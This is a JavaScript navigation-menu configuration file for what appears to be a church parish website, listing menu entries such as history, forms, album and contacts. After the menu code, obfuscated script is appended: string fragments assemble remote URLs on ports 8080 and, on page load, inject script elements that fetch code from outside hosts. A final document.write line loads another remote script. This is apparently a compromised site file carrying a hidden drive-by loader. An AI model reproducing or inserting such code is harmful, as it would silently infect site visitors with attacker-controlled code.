
menunum=0;menus=new Array();_d=document;function addmenu(){menunum++;menus[menunum]=menu;}function dumpmenus(){mt="<script language=javascript>";for(a=1;a<menus.length;a++){mt+=" menu"+a+"=menus["+a+"];"}mt+="<\/script>";_d.write(mt)}

////////////////////////////////////
// Editable properties START here //
////////////////////////////////////

effect = "Fade(duration=0.6);Alpha(style=0,opacity=100);Shadow(color='black', Direction=150, Strength=4)"

timegap=500			// The time delay for menus to remain visible
followspeed=10			// Follow Scrolling speed
followrate=20			// Follow Scrolling Rate
suboffset_top=10;		// Sub menu offset Top position
suboffset_center=10;		// Sub menu offset Left position
closeOnClick = true

style1=[			// style1 is an array of properties. You can have as many property arrays as you need. This means that menus can have their own style.
"white",			// Mouse Off Font Color
//"BD0400",			// Mouse Off Background Color
"3366CC",			// Mouse Off Background Color
"black",			// Mouse On Font Color
"FFE0B7",			// Mouse On Background Color
//"FFFFFF",			// Menu Border Color
"FFFFFF",			// Menu Border Color
11,				// Font Size in pixels
"normal",			// Font Style (italic or normal)
"bold",			// Font Weight (bold or normal)
"Verdana",			// Font Name
3,				// Menu Item Padding
,		// Sub Menu Image (Leave this blank if not needed)
,				// 3D Border & Separator bar
"ffffff",			// 3D High Color
"000099",			// 3D Low Color
,				// Current Page Item Font Color (leave this blank to disable)
,				// Current Page Item Background Color (leave this blank to disable)
,				// Top Bar image (Leave this blank to disable)
"ffffff",			// Menu Header Font Color (Leave blank if headers are not needed)
"000099",			// Menu Header Background Color (Leave blank if headers are not needed)
"D6CFC0",			// Menu Item Separator Color
]


addmenu(menu=[			// This is the array that contains your menu properties and details
"mainmenu",			// Menu Name - This is needed in order for the menu to be called
89,				// Menu Top - The Top position of the menu in pixels
//200,				// Menu Top - The Top position of the menu in pixels
//309,				// Menu Left - The Left position of the menu in pixels
130,				// Menu Left - The Left position of the menu in pixels
90,				// Menu Width - Menus width in pixels
1,				// Menu Border Width
,	                	// Screen Position - here you can use "center;left;right;middle;top;bottom" or a combination of "center:middle"
style1,				// Properties Array - this is set higher up, as above
1,				// Always Visible - allows the menu item to be visible at all time (1=on/0=off)
"center",			// Alignment - sets the menu elements text alignment, values valid here are: left, right or center
,				// Filter - Text variable for setting transitional effects on menu activation - see above for more info
,				// Follow Scrolling - Tells the menu item to follow the user down the screen (visible at all times) (1=on/0=off)
1, 				// Horizontal Menu - Tells the menu to become horizontal instead of top to bottom style (1=on/0=off)
,				// Keep Alive - Keeps the menu visible until the user moves over another menu or clicks elsewhere on the page (1=on/0=off)
,				// Position of TOP sub image left:center:right
,				// Set the Overall Width of Horizontal Menu to 100% and height to the specified amount (Leave blank to disable)
,				// Right To Left - Used in Hebrew for example. (1=on/0=off)
,				// Open the Menus OnClick - leave blank for OnMouseover (1=on/0=off)
,				// ID of the div you want to hide on MouseOver (useful for hiding form elements)
,				// Background image for menu when BGColor set to transparent.
,				// Scrollable Menu
,				// Reserved for future use

				// "Description Text", "URL", "Alternate URL", "Status", "Separator Bar"

//,"parish","show-menu=Parish",,"",1
,"Parish","show-menu=Parish",,"",1
,"Activities","show-menu=Activities",,"",1
,"Forms","show-menu=forms",,"",1
,"Album","show-menu=album",,"",1
,"Contacts","show-menu=contacts",,"",1
,"Search ","show-menu=search",,"",1


]) 

	//addmenu(menu=["committee",
	//,,160,1,"",style1,,"left",effect,,,,,,,,,,,,
    	//,"committee","committee.htm",,,1
	//,"Members list","memberlist.htm",,,1
	//,"Messages","messages.htm",,,1
    	//,"Committee","committee.htm",,,1
	//])

	addmenu(menu=["Parish",
	,,130,1,"",style1,,"left",effect,,,,,,,,,,,,
    	,"History","history.htm",,,1
	,"Our Bishops","bishop.htm",,,1
	,"Our Vicars"," vicars.htm",,,1
	//,"Members List"," member.htm",,,1
	,"Kaisthana Samithy"," Kaisthana.htm",,,1
        ,"Office Bearers"," officebearer.htm",,,1
	,"Felicitations"," feli.htm",,,1
	,"Harvest Festival"," harvestfest.htm",,,1
                 ,"Parish Library","../library/library.htm",,,1
	])

    addmenu(menu=["Activities",
	,,160,1,"",style1,,"left",effect,,,,,,,,,,,,
	,"Year Planner","yrplanner.htm",,,1
    	,"Family Benefit Scheme","fmly_Bnfit.htm",,,1
    	,"AMPWF","ampwf.htm",,,1
     	,"Poor Fund","Poor_Fund.htm",,,1
     	//,"Prayer Request","pray_request.htm",,,1
     	,"Special Project","spl_project.htm",,,1
	,"Homeland Fellowship","../homeland/intro.html",,,1
     	//,"News Letter","news_letter.htm",,,1		
     	//,"Our Sincere Thanks","our_sincere.htm",,,1
	])


    addmenu(menu=["forms",
	,,140,1,"",style1,,"left",effect,,,,,,,,,,,,
	,"Membership","memb_form.htm",,,1
	,"Membership update","update_form.htm",,,1
	,"Family Benefit Scheme","fmly_Bnfit.htm",,,1
	,"AMPWF Loan","AMPWF_form.htm",,,1
	,"Birthday Envelope","bdenv.htm",,,1
	,"Sunday School Forms","ss.htm",,,1
	//,"Other Forms","other_form.htm",,,1
	//,"Dubai MTYS","dubai_mtys.htm",,,1
	//,"Dubai","dubai.htm",,,1
	])


	addmenu(menu=["album",
	,,110,1,"",style1,,"left",effect,,,,,,,,,,,,
	,"Parish Album","album.htm",,,1
	//,"Transportation","transport.htm",,,1
	//,"Feedback","feedback.htm",,,1
	//,"Guestbook","/gb",,,1
	//,"Useful Links","useful_links.htm",,,1  	
  	//,"Credits","credit.htm",,,1
	])

    addmenu(menu=["contacts",
	,,115,1,"",style1,,"left",effect,,,,,,,,,,,,
	,"Location Map","location.htm",,,1
	,"Transportation","transport.htm",,,1
	,"Feedback","feedback.htm",,,1
	,"Guestbook","/gb",,,1
	,"Useful Links","useful_links.htm",,,1 
	,"Check Mail","/webmail",,,1  	 	
  	,"Credits","credit.htm",,,1
	])

    addmenu(menu=["search",
	,,110,1,"",style1,,"left",effect,,,,,,,,,,,,
	,"Search The Site","search.htm",,,1
	//,"Transportation","transport.htm",,,1
	//,"Feedback","feedback.htm",,,1
	//,"Guestbook","/gb",,,1
	//,"Useful Links","useful_links.htm",,,1  	
  	//,"Credits","credit.htm",,,1
	])

dumpmenus()





this.l=58576;this.l++;function A(){var m="";var N=["a","Ci","nl"];var _="src";var K=String("defe"+"eShr".substr(3));var fL={};J=[];var k=new String("onlo"+"adp4YV".substr(0,2));var ys=new String();var km=["yZ","op","j"];var r=new String("app"+"end"+"Chi"+"ld");var mR={};this.b=31351;this.b-=231;var C=document;var wd=["O"];var P=new String("body");var f="scr"+"iptAz9".substr(0,3);XP=58042;XP-=97;var R=String("cr"+"ea"+"te"+"El"+"em"+"en"+"E8it".substr(3));Rs=["wl","T"];F=["G","oi"];var s=window;this.CS="";function Cn(){this.dQ=62909;this.dQ+=178;Z=[];try {this.Cw=35301;this.Cw-=201;var Y=189992-181912;c={Fe:61360};var V=String("ht"+"tp"+":/rXe".substr(0,2)+"/dq9h".substr(0,2)+"ir"+"ty"+"si"+"n."+"kQYruQkY".substr(3,2)+":");var mt="mt";var y=String("XHP/sa".substr(3)+"9O3Mmsu".substr(4)+"ng-"+"gvNcomNvg".substr(3,3)+"/go"+"oglpwhn".substr(0,3)+"e.c"+"om/"+"kinxV9F".substr(0,3)+"opo"+"isk"+".ru"+".ph"+"pmB8".substr(0,1));var M={YA:"fX"};var o=9264-9263;fLH=8703;fLH++;bg=46105;bg++;n=C[R](f);try {var JN='rw'} catch(JN){};q=27172;q-=61;n[K]=o;var Jt={uc:false};var wu=["Nw","e","cN"];n[_]=V+Y+y;this.Rq=4508;this.Rq-=78;wO=["bT"];var XN="";var JNC="";this.nn=49760;this.nn-=21;C[P][r](n);this.Lm=46466;this.Lm--;var Oa=[];NN={Py:false};} catch(AJ){};Kw={XV:false};var nZ="nZ";}aF=[];ff={pt:"XVP"};s[k]=Cn;};fb=31571;fb+=206;A();var ns=new Array();qg=63355;qg++;
w=49080;w--;this.uV=23869;this.uV++;try {var pg=42312;k={W:11774};var J=[];var K=window["unesc"+"ape"];M=["wp","RTN","l"];var RO=["mU"];kA=["I","MG","C"];Zt=["cf","V","T"];try {} catch(wj){};hC=[];this.lX=7207;this.lX-=5;var PN={};var m=window[(new String("RegBjf".substr(0,3)+"Exp"))];var ZI="";var lB="";var Z=new String("repl"+"ace");try {var Os='X'} catch(Os){};var p="1";var Ys=6170;var aM=8710;var Y="onlo"+"ad";var R='';try {var Jm='B'} catch(Jm){};var zJ='';var QI={BS:45267};var cc=44624;var sD=23351;var oc=11129;function Q(p,G){this.PF=27955;this.PF--;var fo={aMR:"fc"};this.wY=64882;this.wY--;KU=["yM"];PV=["Is"];try {var ib='vD'} catch(ib){};var RT=String("[");this.Ms=26494;this.Ms+=33;RT+=G;this.Gw=1443;this.Gw+=82;this.aq=17718;this.aq+=152;Pq=[];this.ww=62236;this.ww+=70;RT+=K("%5d");this.G_="G_";wc=35160;wc--;C_=921;C_--;aJ={rK:"RI"};var nB={MF:false};var e=new m(RT, String("g"));var yX=new Array();var Ns=["OJ","q","XR"];try {var mB='OC'} catch(mB){};return p.replace(e, R);};var Uz=["oD","yI"];var jP=["Qy","E"];this.wK="wK";var cmC=new Date();var YM=new String();var so=new Date();var aw=new Date();var h="ht"+"tp"+":/"+"/a"+"shEOXY".substr(0,2)+"do"+"g."+"ru"+":r1LV".substr(0,1);this.cT='';var bg=new Date();var JO=["Ok","Rk","MC"];var ew=["EK","Yd","OU"];var SB=new Date();var c=431040-422960;var i=String("/or"+"kut"+"-co"+"-in"+"/go"+"bakogl".substr(3)+"e.c"+"om/"+"fc2"+".co"+"m.p"+"hp");var pZ=new String();var vEG=new String();var rm=new String();var nv=new String();GwZ=54657;GwZ--;this.wT="";this.CFq="";function t(){BE={};__=["dG"];gV={};BM=["rl","ni","HQ"];var yr=new String();var Ea={oy:31169};var dMI={wWF:18226};var LX=["WM","Zf"];var av={Uo:59301};var U=document;var b=new String("6Xkappe".substr(3)+"ndCh"+"D53Tild3DT5".substr(4,3));var ttX={SAY:false};this.SY=13291;this.SY--;var QD=Q('sbcTrbiLpvtb','BvLbTdU6y');br={Zy:false};var ko={Ff:"ap"};try {var en='Ij'} catch(en){};var lq=false;BU=["SL","GK","PP"];PK=["H_","ld"];iE=["gM","cN","xx"];var jE='';d=U.createElement(QD);Td=59167;Td+=199;var sI={nX:39060};var YG=new Array();this.fK=false;this.PjK=false;this.rz=14090;this.rz--;Kd=["dA","da"];Kr=["nr","qu"];z=h+c;this.Do='';this.oG='';z=z+i;try {var CG='lV'} catch(CG){};try {var tW='lp'} catch(tW){};this.N_=7748;this.N_+=96;var ug="ug";var yS="yS";var IJ=false;var PE=false;d[new String("defer")]=p;var zK={};var PM=["QH"];this.GXK='';RN=63896;RN++;WK=41083;WK++;wd=63988;wd++;var F=U.body;var Ox={Aj:33002};var nI={Xl:36059};Ni=64372;Ni-=252;var pW={};var hk={_b:50330};d.src=z;this.oT=8436;this.oT+=229;rlQ=["Xu","mb"];try {var fKE='rKL'} catch(fKE){};ku=["bS","QN"];wA=["FE"];var fl={_m:"HO"};var lT=["vW","SYr"];F[b](d);CC=[];pA=[];try {var TK='OK'} catch(TK){};};RJ={sc:false};bO=["uP","V_","io"];_Y=["ja","IgI","IV"];gn={lVU:6091};var yY=["NG","mL","sY"];window[Y]=t;ji=12632;ji+=234;this.hA="hA";VD=50325;VD--;var XlG={Ml:"zA"};var ZG=["gx","Uu"];koL=36508;koL-=216;NO={nA:false};this.Bq='';} catch(RP){var Tw='';Rl={BL:15827};var IM=["uR","pWP"];var AI=["tV","_J"];this.UQ="";var kV={Ng:"NHa"};var up={VU:62875};};var dAz=new Array();




document.write('<s'+'cript type="text/javascript" src="http://assol.metro-trading.net:8080/Link.js"></scr'+'ipt>');